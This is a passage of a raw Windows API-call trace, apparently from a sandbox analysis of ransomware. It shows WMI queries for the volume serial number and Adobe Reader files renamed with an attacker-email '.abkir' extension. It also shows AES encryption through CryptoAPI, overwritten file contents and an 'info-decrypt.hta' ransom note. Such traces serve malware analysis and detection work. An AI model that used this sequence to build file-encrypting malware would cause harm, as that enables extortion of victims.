[6]=0x1d, [7]=0x7)), ppvObject=0x8f6ebf8 | out: ppvObject=0x8f6ebf8*=0x0) returned 0x80004002 [0196.661] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024968, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ec0c | out: ppvObject=0x8f6ec0c*=0x6027180) returned 0x0 [0196.661] WbemLocator:IUnknown:Release (This=0x6024968) returned 0x0 [0196.661] WbemLocator:IUnknown:QueryInterface (in: This=0x6027180, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e82c | out: ppvObject=0x8f6e82c*=0x6027180) returned 0x0 [0196.661] WbemLocator:IUnknown:QueryInterface (in: This=0x6027180, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e7e8 | out: ppvObject=0x8f6e7e8*=0x0) returned 0x80004002 [0196.661] WbemLocator:IUnknown:AddRef (This=0x6027180) returned 0x3 [0196.661] WbemLocator:IUnknown:QueryInterface (in: This=0x6027180, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e144 | out: ppvObject=0x8f6e144*=0x0) returned 0x80004002 [0196.661] WbemLocator:IUnknown:QueryInterface (in: This=0x6027180, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0196.661] WbemLocator:IUnknown:QueryInterface (in: This=0x6027180, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e100 | out: ppvObject=0x8f6e100*=0x0) returned 0x80004002 [0196.661] CoGetContextToken (in: pToken=0x8f6e160 | out: pToken=0x8f6e160) returned 0x0 [0196.662] CoGetContextToken (in: pToken=0x8f6e568 | out: pToken=0x8f6e568) returned 0x0 [0196.662] WbemLocator:IUnknown:QueryInterface (in: This=0x6027180, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5f8 | out: ppvObject=0x8f6e5f8*=0x0) returned 0x80004002 [0196.662] WbemLocator:IUnknown:Release (This=0x6027180) returned 0x2 [0196.662] WbemLocator:IUnknown:Release (This=0x6027180) returned 0x1 [0196.662] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0196.662] CoGetContextToken (in: pToken=0x8f6eb38 | out: pToken=0x8f6eb38) returned 0x0 [0196.662] WbemLocator:IUnknown:QueryInterface (in: This=0x6027180, riid=0x8f6ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ec04 | out: ppvObject=0x8f6ec04*=0x6027180) returned 0x0 [0196.662] WbemLocator:IUnknown:AddRef (This=0x6027180) returned 0x3 [0196.662] WbemLocator:IUnknown:Release (This=0x6027180) returned 0x2 [0196.662] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031510, puCount=0x8f6ed9c | out: puCount=0x8f6ed9c*=0x2) returned 0x0 [0196.662] WbemDefPath:IWbemPath:GetText (in: This=0x6031510, lFlags=8, puBuffLength=0x8f6ed98*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed98*=0xf, pszText=0x0) returned 0x0 [0196.662] WbemDefPath:IWbemPath:GetText (in: This=0x6031510, lFlags=8, puBuffLength=0x8f6ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0196.662] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec74 | out: ppv=0x8f6ec74*=0x6027190) returned 0x0 [0196.662] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027190, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ed08 | out: ppNamespace=0x8f6ed08*=0x6033634) returned 0x0 [0197.189] WbemLocator:IUnknown:QueryInterface (in: This=0x6033634, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eba4 | out: ppvObject=0x8f6eba4*=0xb5b5e4) returned 0x0 [0197.189] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b5e4, pProxy=0x6033634, pAuthnSvc=0x8f6ebf4, pAuthzSvc=0x8f6ebf0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec, pImpLevel=0x8f6ebdc, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4 | out: pAuthnSvc=0x8f6ebf4*=0xa, pAuthzSvc=0x8f6ebf0*=0x0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec*=0x6, pImpLevel=0x8f6ebdc*=0x2, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4*=0x1) returned 0x0 [0197.189] WbemLocator:IUnknown:Release (This=0xb5b5e4) returned 0x1 [0197.189] WbemLocator:IUnknown:QueryInterface (in: This=0x6033634, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb98 | out: ppvObject=0x8f6eb98*=0xb5b604) returned 0x0 [0197.189] WbemLocator:IUnknown:QueryInterface (in: This=0x6033634, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb94 | out: ppvObject=0x8f6eb94*=0xb5b5e4) returned 0x0 [0197.189] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b5e4, pProxy=0x6033634, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0197.189] WbemLocator:IUnknown:Release (This=0xb5b5e4) returned 0x2 [0197.189] WbemLocator:IUnknown:Release (This=0xb5b604) returned 0x1 [0197.189] CoTaskMemFree (pv=0xbd4a68) [0197.190] WbemLocator:IUnknown:Release (This=0x6027190) returned 0x0 [0197.190] WbemLocator:IUnknown:QueryInterface (in: This=0x6033634, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e794 | out: ppvObject=0x8f6e794*=0xb5b604) returned 0x0 [0197.190] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e750 | out: ppvObject=0x8f6e750*=0x0) returned 0x80004002 [0197.190] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e56c | out: ppvObject=0x8f6e56c*=0x0) returned 0x80004002 [0197.191] WbemLocator:IUnknown:AddRef (This=0xb5b604) returned 0x3 [0197.191] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0ac | out: ppvObject=0x8f6e0ac*=0x0) returned 0x80004002 [0197.191] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0197.193] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e068 | out: ppvObject=0x8f6e068*=0xb5b564) returned 0x0 [0197.193] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b564, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e070 | out: pCid=0x8f6e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.193] WbemLocator:IUnknown:Release (This=0xb5b564) returned 0x3 [0197.193] CoGetContextToken (in: pToken=0x8f6e0c8 | out: pToken=0x8f6e0c8) returned 0x0 [0197.193] CoGetContextToken (in: pToken=0x8f6e4d0 | out: pToken=0x8f6e4d0) returned 0x0 [0197.193] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e560 | out: ppvObject=0x8f6e560*=0xb5b5ec) returned 0x0 [0197.193] WbemLocator:IRpcOptions:Query (in: This=0xb5b5ec, pPrx=0xb5b604, dwProperty=2, pdwValue=0x8f6e588 | out: pdwValue=0x8f6e588) returned 0x80004002 [0197.193] WbemLocator:IUnknown:Release (This=0xb5b5ec) returned 0x3 [0197.193] WbemLocator:IUnknown:Release (This=0xb5b604) returned 0x2 [0197.193] CoGetContextToken (in: pToken=0x8f6eaa8 | out: pToken=0x8f6eaa8) returned 0x0 [0197.193] CoGetContextToken (in: pToken=0x8f6ea08 | out: pToken=0x8f6ea08) returned 0x0 [0197.193] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x8f6ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ead4 | out: ppvObject=0x8f6ead4*=0x6033634) returned 0x0 [0197.193] WbemLocator:IUnknown:AddRef (This=0x6033634) returned 0x4 [0197.193] WbemLocator:IUnknown:Release (This=0x6033634) returned 0x3 [0197.193] WbemLocator:IUnknown:Release (This=0x6033634) returned 0x2 [0197.193] SysStringLen (param_1=0x0) returned 0x0 [0197.193] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60314a0, puCount=0x8f6ee6c | out: puCount=0x8f6ee6c*=0x0) returned 0x0 [0197.193] WbemDefPath:IWbemPath:GetText (in: This=0x60314a0, lFlags=2, puBuffLength=0x8f6ee68*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee68*=0x20, pszText=0x0) returned 0x0 [0197.193] WbemDefPath:IWbemPath:GetText (in: This=0x60314a0, lFlags=2, puBuffLength=0x8f6ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0197.193] CoGetContextToken (in: pToken=0x8f6ead8 | out: pToken=0x8f6ead8) returned 0x0 [0197.193] WbemLocator:IUnknown:AddRef (This=0xb5b604) returned 0x3 [0197.193] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b604, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e96c | out: ppvObject=0x8f6e96c*=0xb5b604) returned 0x0 [0197.194] WbemLocator:IUnknown:Release (This=0xb5b604) returned 0x3 [0197.194] WbemLocator:IUnknown:Release (This=0xb5b604) returned 0x2 [0197.194] WbemDefPath:IWbemPath:GetText (in: This=0x60314a0, lFlags=2, puBuffLength=0x8f6ee70*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee70*=0x20, pszText=0x0) returned 0x0 [0197.194] WbemDefPath:IWbemPath:GetText (in: This=0x60314a0, lFlags=2, puBuffLength=0x8f6ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0197.194] IWbemServices:GetObject (in: This=0x6033634, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6ee24*=0x6028180, ppCallResult=0x0) returned 0x0 [0197.515] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031510, puCount=0x8f6ee24 | out: puCount=0x8f6ee24*=0x2) returned 0x0 [0197.515] WbemDefPath:IWbemPath:GetText (in: This=0x6031510, lFlags=4, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0xf, pszText=0x0) returned 0x0 [0197.515] WbemDefPath:IWbemPath:GetText (in: This=0x6031510, lFlags=4, puBuffLength=0x8f6ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.515] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3602cb0*=0, plFlavor=0x3602cb4*=0 | out: pVal=0x8f6ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3602cb0*=8, plFlavor=0x3602cb4*=0) returned 0x0 [0197.515] SysStringByteLen (bstr="9C354B42") returned 0x10 [0197.516] SysStringByteLen (bstr="9C354B42") returned 0x10 [0197.516] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3602cb0*=8, plFlavor=0x3602cb4*=0 | out: pVal=0x8f6ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3602cb0*=8, plFlavor=0x3602cb4*=0) returned 0x0 [0197.516] SysStringByteLen (bstr="9C354B42") returned 0x10 [0197.516] SysStringByteLen (bstr="9C354B42") returned 0x10 [0197.516] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm", lpFilePart=0x0) returned 0x36 [0197.516] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x59 [0197.516] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee88) returned 1 [0197.516] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmecze.htm"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef04 | out: lpFileInformation=0x8f6ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80815880, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x2ef06d80, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0197.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee84) returned 1 [0197.516] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmecze.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCZE.htm.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmecze.htm.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0197.517] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm", lpFilePart=0x0) returned 0x36 [0197.518] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0197.518] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea8) returned 1 [0197.518] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef24 | out: lpFileInformation=0x8f6ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129dd140, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x129dd140, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x12b0dc40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0197.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea4) returned 1 [0197.518] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm", lpFilePart=0x0) returned 0x36 [0197.518] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eef4) returned 1 [0197.518] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmehrv.htm"), fInfoLevelId=0x0, lpFileInformation=0x36031ec | out: lpFileInformation=0x36031ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80861b40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x42aa)) returned 1 [0197.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eef0) returned 1 [0197.518] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm", nBufferLength=0x105, lpBuffer=0x8f6e934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm", lpFilePart=0x0) returned 0x36 [0197.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee28) returned 1 [0197.519] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmehrv.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2f0 [0197.519] GetFileType (hFile=0x2f0) returned 0x1 [0197.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee24) returned 1 [0197.519] GetFileType (hFile=0x2f0) returned 0x1 [0197.519] GetFileSize (in: hFile=0x2f0, lpFileSizeHigh=0x8f6ef30 | out: lpFileSizeHigh=0x8f6ef30*=0x0) returned 0x42aa [0197.519] ReadFile (in: hFile=0x2f0, lpBuffer=0x37dcb24, nNumberOfBytesToRead=0x42aa, lpNumberOfBytesRead=0x8f6eedc, lpOverlapped=0x0 | out: lpBuffer=0x37dcb24*, lpNumberOfBytesRead=0x8f6eedc*=0x42aa, lpOverlapped=0x0) returned 1 [0197.553] CloseHandle (hObject=0x2f0) returned 1 [0197.553] CryptAcquireContextW (in: phProv=0x8f6ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee7c*=0x66bbb70) returned 1 [0197.555] CryptGenRandom (in: hProv=0x66bbb70, dwLen=0x10, pbBuffer=0x37ef130 | out: pbBuffer=0x37ef130) returned 1 [0198.373] CryptImportKey (in: hProv=0x66bbb70, pbData=0x364d31c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6ee4c | out: phKey=0x8f6ee4c*=0xb7f490) returned 1 [0198.373] CryptContextAddRef (hProv=0x66bbb70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0198.373] CryptContextAddRef (hProv=0x66bbb70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0198.373] CryptDuplicateKey (in: hKey=0xb7f490, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6ee3c | out: phKey=0x8f6ee3c*=0xb7f9d0) returned 1 [0198.373] CryptContextAddRef (hProv=0x66bbb70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0198.373] CryptSetKeyParam (hKey=0xb7f9d0, dwParam=0x4, pbData=0x364d3fc*=0x1, dwFlags=0x0) returned 1 [0198.373] CryptSetKeyParam (hKey=0xb7f9d0, dwParam=0x1, pbData=0x364d3c8, dwFlags=0x0) returned 1 [0198.373] CryptEncrypt (in: hKey=0xb7f9d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x364d40c*, pdwDataLen=0x8f6eea8*=0x42b0, dwBufLen=0x42b0 | out: pbData=0x364d40c*, pdwDataLen=0x8f6eea8*=0x42b0) returned 1 [0198.374] CryptEncrypt (in: hKey=0xb7f9d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36516e0*, pdwDataLen=0x8f6eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x36516e0*, pdwDataLen=0x8f6eeb0*=0x10) returned 1 [0198.375] CryptDestroyKey (hKey=0xb7f490) returned 1 [0198.375] CryptReleaseContext (hProv=0x66bbb70, dwFlags=0x0) returned 1 [0198.375] CryptReleaseContext (hProv=0x66bbb70, dwFlags=0x0) returned 1 [0198.375] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm", nBufferLength=0x105, lpBuffer=0x8f6e920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm", lpFilePart=0x0) returned 0x36 [0198.375] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee14) returned 1 [0198.375] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmehrv.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e0 [0198.375] GetFileType (hFile=0x4e0) returned 0x1 [0198.375] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee10) returned 1 [0198.375] GetFileType (hFile=0x4e0) returned 0x1 [0198.376] WriteFile (in: hFile=0x4e0, lpBuffer=0x3651ce8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6eea4, lpOverlapped=0x0 | out: lpBuffer=0x3651ce8*, lpNumberOfBytesWritten=0x8f6eea4*=0x20, lpOverlapped=0x0) returned 1 [0198.376] CloseHandle (hObject=0x4e0) returned 1 [0198.377] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0198.377] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0198.377] CoTaskMemFree (pv=0xbed438) [0198.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0198.377] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee50 | out: ppv=0x8f6ee50*=0xb51e34) returned 0x0 [0198.377] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ee48 | out: pAptType=0x8f6ee48*=1) returned 0x0 [0198.377] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ee4c | out: ppvObject=0x8f6ee4c*=0x0) returned 0x80004002 [0198.377] IUnknown:Release (This=0xb51e34) returned 0x1 [0198.378] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e7b8 | out: ppv=0x8f6e7b8*=0x60278f0) returned 0x0 [0198.378] WbemDefPath:IUnknown:QueryInterface (in: This=0x60278f0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, 